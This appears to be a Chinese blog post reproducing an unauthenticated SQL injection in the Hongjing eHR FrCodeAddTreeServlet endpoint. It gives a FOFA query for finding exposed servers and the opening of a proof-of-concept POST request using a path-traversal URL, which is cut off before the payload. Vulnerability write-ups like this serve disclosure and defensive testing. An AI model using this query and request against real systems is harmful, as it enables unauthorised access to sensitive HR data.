宏景eHR FrCodeAddTreeServlet SQL注入漏洞复现(含nuclei-POC)

免责声明 由于传播、利用本CSDN所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为承担任何责任,一旦造成后果请自行承担!
一、产品介绍

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。

二、漏洞描述

宏景eHR FrCodeAddTreeServlet 接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL命令,从而获取服务器敏感信息。

三、漏洞危害

未经过身份认证的远程攻击者可利用此漏洞执行任意SQL命令,从而获取服务器敏感信息。

四、漏洞复现

FOFA:app="HJSOFT-HCM"

宏景eHR FrCodeAddTreeServlet SQL注入漏洞复现(含nuclei-POC)_第1张图片

POC如下

POST  /templates/attestation/../../servlet/FrCodeAddTreeServlet HTTP/1.1
Host: url
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Ac

你可能感兴趣的:(漏洞复现,安全,web安全,网络安全)